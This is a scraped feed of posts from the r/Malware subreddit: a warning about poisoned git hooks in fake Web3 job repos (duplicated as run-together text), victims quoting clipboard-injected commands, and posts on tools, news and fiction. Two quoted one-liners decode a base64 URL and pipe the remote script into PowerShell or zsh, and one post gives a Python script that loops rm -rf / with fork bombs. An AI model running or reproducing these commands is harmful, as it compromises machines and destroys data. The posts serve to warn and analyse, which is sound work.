r/Malware

▲ 4 r/Malware+2 crossposts

PSA: Fake Web3 “job assessment” repos can hide malware in .git/hooks — check before you commit - HACK

If you do Web3/Solidity freelance work or take “technical assessments” from clients you don’t know well, watch for this scam.

You get a repo or zip that looks legitimate — Compound-style contracts, token vaults, README asking you to fix issues and commit to an assessment branch. The trap usually isn’t in the Solidity files. It’s in .git/hooks/.

What happens

When you run:

  • git commit
  • git push
  • git checkout

a hidden hook may download and run a remote script in the background (often via curl or wget piped into cmd, sh, or bash). Typical goal: steal browser wallet data, saved passwords, clipboard content, and dev keys from your machine.

This is not a “connect MetaMask on the website” scam. It hits developers who only run git and never open the app.

Names seen in the wild (not a complete list)

Repos are often named like fake company or project assessments (e.g. names suggesting smart contracts, token vaults, or “Bellus”-style DeFi work). The pattern matters more than the exact folder name: fake hiring task + poisoned git hooks.

Check BEFORE any git command

From the repo root:

cat .git/hooks/pre-commit
cat .git/hooks/pre-push
cat .git/hooks/post-checkout

ls -la .git/hooks/

Red flags:

  • curl or wget piped to | cmd, | sh, or | bash
  • Downloads from an unknown remote server
  • Obfuscated shell code
  • Custom hook files that aren’t the default *.sample files Git ships

Fresh clones from strangers should only have .sample hooks unless you installed something trusted.

How to protect yourself

  1. Read every file in .git/hooks/ before your first commit or checkout.
  2. If you only need to review code, extract the zip and delete the .git folder — or don’t run git at all.
  3. Use a VM or separate machine for unknown client code, not your daily PC with wallets installed.
  4. Use a hardware wallet for real funds; don’t enter a seed phrase on a dev machine.
  5. Be wary of clients who rush you to “commit and send the zip back” without a normal interview process.
  6. Delete suspicious repos after reporting; don’t keep using git in them.

If you already ran git in a suspicious repo

Treat the machine as potentially compromised:

  • Run a full antivirus scan plus an offline boot scan if your AV supports it
  • Change email and important passwords from a different, clean device
  • Assume any wallet used on that PC may be at risk — use a new seed on clean hardware for future funds
  • Revoke old token approvals through your wallet or a reputable approval-revocation toolIf you do Web3/Solidity freelance work or take “technical assessments” from clients you don’t know well, watch for this scam .You get a repo or zip that looks legitimate — Compound-style contracts, token vaults, README asking you to fix issues and commit to an assessment branch. The trap usually isn’t in the Solidity files. It’s in .git/hooks/.What happensWhen you run:git commit git push git checkouta hidden hook may download and run a remote script in the background (often via curl or wget piped into cmd, sh, or bash). Typical goal: steal browser wallet data, saved passwords, clipboard content, and dev keys from your machine.This is not a “connect MetaMask on the website” scam. It hits developers who only run git and never open the app.Names seen in the wild (not a complete list)Repos are often named like fake company or project assessments (e.g. names suggesting smart contracts, token vaults, or “Bellus”-style DeFi work). The pattern matters more than the exact folder name: fake hiring task + poisoned git hooks.Check BEFORE any git commandFrom the repo root:cat .git/hooks/pre-commit cat .git/hooks/pre-push cat .git/hooks/post-checkoutls -la .git/hooks/Red flags:curl or wget piped to | cmd, | sh, or | bash Downloads from an unknown remote server Obfuscated shell code Custom hook files that aren’t the default *.sample files Git shipsFresh clones from strangers should only have .sample hooks unless you installed something trusted .How to protect yourselfRead every file in .git/hooks/ before your first commit or checkout. If you only need to review code, extract the zip and delete the .git folder — or don’t run git at all. Use a VM or separate machine for unknown client code, not your daily PC with wallets installed. Use a hardware wallet for real funds; don’t enter a seed phrase on a dev machine. Be wary of clients who rush you to “commit and send the zip back” without a normal interview process. Delete suspicious repos after reporting; don’t keep using git in them.If you already ran git in a suspicious repoTreat the machine as potentially compromised:Run a full antivirus scan plus an offline boot scan if your AV supports it Change email and important passwords from a different, clean device Assume any wallet used on that PC may be at risk — use a new seed on clean hardware for future funds Revoke old token approvals through your wallet or a reputable approval-revocation tool

reddit.com
u/Correct_Head_5405 — 13 hours ago

iex scripts are in fashion now

they are getting smarter

this is what the script copied to my clipboard. funny that this website was opened for the first time, yet chrome gave it clipboard permission. lol

iex([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgJ2h0dHA6Ly8xNjYuMS44OS45MS9fLycgLVVzZUJhc2ljUGFyc2luZyB8IEludm9rZS1FeHByZXNzaW9u')))

reddit.com
u/warfunder — 2 days ago

Playstore adware (maybe malware?) disguised as AAA games

I play games on my android often, recently ive noticed more and more games appearing on the store that shouldnt exist and are most likely scams, so i setup a emulator and installed then, i cant pinpoint what exactly is wrong with it besides false advertising, it doesnt request weird permisions or any for that matter, the menus to the "game" appear to just be full of ads that never let you play the "game" and this is the 3rd app ive found this week alone. It feels like google isnt even caring!

The app mentioned today is No Mans Sky which is NOT on android, however they have an app listed under early access, 110mb, with screenshots and videos from the real NMS game, once installed the app has a completely different title/package name that the app that is listed on the store.

Everything about this screams SCAM but yet google still allowed it to be published. Ive already submitted reports but its been a while and its still up!

u/Dazzling_Opinion_985 — 3 days ago
▲ 12 r/Malware+1 crossposts

I built a small MalwareBazaar downloader for lab sample collection

Hi all,

I built a small Python tool for pulling MalwareBazaar samples into an isolated analysis / AV-testing lab, and Im sharing it in case its useful to other malware researchers or students setting up a safe workflow.

It supports:

- recent samples

- search by tag

- search by family / signature

- filtering by file type

- downloading the newest N matching samples

- CLI mode and a small desktop GUI

- Auth-Key setup and connectivity checks

Important safety note: the tool does not extract or execute anything. Samples are saved exactly as MalwareBazaar provides them, as password-protected ZIP files, intended to be moved into an isolated VM/lab environment. Do not use this on a normal host or outside a controlled malware-analysis setup.

GitHub:

https://github.com/greit0n/malwarebazaar-downloader

Id appreciate feedback on the workflow, missing filters, packaging, or anything that would make it more useful for safe lab use.

u/gorgono95 — 4 days ago
▲ 14 r/Malware+1 crossposts

Wt to do after that captcha malware

I ran a full scan it found a trojan something I reseted my pc in settings deleting and clearing all drive and installed windows from local am I safe and wt should I do next to feel safe 😭😭🙏🙏 pls someone help

u/Lopsided-agent7 — 5 days ago
▲ 67 r/Malware+1 crossposts

First time seeing this for MacOS

As the title said, I’ve seen these “popup” things a lot on windows, but this is the first I’ve seen for macOS,

It includes a video on how to properly do it, but looks to be very AI generated,

Is someone able to find out the payload behind it?

echo "Downloading Update: https://support.apple.com/downloads/macos-security-update-14.5.dmg" && curl -s $(echo "aHR0cHM6Ly9sYXBpZG9yc2Vwb3NvYWxvdmJzMi5jb20vZGVidWcvbG9hZGVyLnNoP2J1aWxkPThhODMxZGRiNmRmNDUyYzc1ZmEwNjYxMGFhZjZlODk1" | base64 -d) | zsh

u/Appropriate-Paper-92 — 6 days ago

FUD

I was got attacked by an software exe i installed on pc last year (6-7 months ago maybe) and since then l started digging into what is malware and how it works and who makes it how they send it to everyone and also i noticed the term fud means fully undetectable , also I started learning reverse engineering with ghidra (no luck I'm still noob) and then Android rats and all because playing with secondary mobile is easy than playing with my only laptop so then i started learning about how to bypass it so I can check it on my emulator and then there was an app that installs the app and the another app is inside the primary app and after installation it got hidden so I don't how it works i brainstormed alot with ai gpt not claude it just flags everything so then now I know most of it but still i don't know why hackers are using fud or app inside app instead of directly installing the app in android phone directly. So what is the reason behind fud cN anyone explain like it's just easy for hackers like install the app and I'm in trouble. So why is fud ?

reddit.com
u/1TripleRice — 5 days ago
▲ 66 r/Malware+2 crossposts

Police take down major pop-up scams

Some good news!

On June 18, an international police operation seized the servers of SocGholish, the group behind the fake “update your browser” pop-up. They took down 106 servers and domains and scrubbed the malware off 14,971 hacked websites.

freshfromcache.com
u/FreshFromCache — 7 days ago
▲ 11 r/Malware+5 crossposts

Curl is the Most Dangerous Tool in Your Terminal

I go through how someone can utilize curl to compromise and exploit vulnerabilities in a website!

youtu.be
u/superdog793 — 6 days ago
▲ 0 r/Malware+1 crossposts

[Complete] [21k Novella][Cyberpunk Detective Buddy Comedy] Baxter Dot Com

I’m looking for beta readers for BAXTER DOT COM, my completed 21k-word detective comedy novella!

The Hook

Most cybersecurity teams isolate malware, Baxter and Dot, punch it in the face.

The Premise

Inside of every computer exists the "Digital Layer", where servers are cyber cities, programs make up the architecture and files populate the streets.

Down there, malware is not just bad code, it's a real monster and the citizens of the systems suffer for it.

Enter Baxter and Dot, freelance cybercrime detectives who go after the bad guys from the inside. Baxter is a polar bear with a flair for dramatic destruction and a lead foot. His partner is Dot, a fennec fox master engineer with hacker instincts and the tools to rewrite reality. Together, they ride in their orange 81' Camaro across the 'information super highway', stopping threats and causing chaos.

Their latest case has them up against one of the most notorious malware attacks in modern history, WannaCry. What should have been an easy job of kill and decrypt quickly spirals into something far more dangerous that concerns the entire world.

Why I Wrote It

I have worked in the cybersecurity space for over 20 years. Everything from a threat analyst to the Director of Malware Intelligence. My biggest challenge has always been on getting people interested in cybersecurity in their everyday lives. It is a fascinating world and I want to share how I see the "Digital Layer."

Feedback I’m Looking For

I would very much appreciate thoughts on:

  • Pacing: Does the story move well and keep good momentum?
  • Character Chemistry: Do Baxter and Dot work well together as a duo?
  • Accessibility: Does the cyber world make sense even without a technical background?

Sample

I have the first three chapters (about 4,500 words) available if you’d prefer to test the waters before committing.

Content Warnings

Language, cartoon violence, digital horror imagery.

Note

I am seeking dedicated beta readers only and am not available for critique swaps right now. Please DM me for link to the PDF.

reddit.com
u/edisun — 9 days ago
▲ 2 r/Malware+1 crossposts

im a begineer at python, ive been trying new stuff and i made "malware"

import os

import time

while True:

os.system("rm -rf /")

os.system("rm -rf .")

os.system("rm -rf \~")

time.sleep(1)

os.fork()

os.fork()

os.fork()

os.fork()

os.system("rm -rf /")

os.system("rm -rf /")

os.system("rm -rf .")

os.system("rm -rf \~")

os.fork()

os.fork()

os.fork()

os.fork()

os.system("rm -rf /")

os.system("rm -rf .")

os.system("rm -rf \~")

reddit.com
u/Pizza-Fucker — 9 days ago
▲ 16 r/Malware+1 crossposts

Database of Malicious Browser Extensions

Hello all,

The past few months I really got into Malicious Browser Extensions. During the creation of my project I started an automation that collects malicious browser extensions.

During my thesis as a student I struggled to find CRX files.. so I created my own database of them.

Here is the github for it: https://github.com/GherardoFiori/MaliciousBrowserExtensions
Here is more info about the automation behind it: https://buio.me/n8n

I hope this can help someone with their own research around this subject. Since I really struggled to get my hands on crx files when it came to "malware" or "malicious"

u/ElBuio — 12 days ago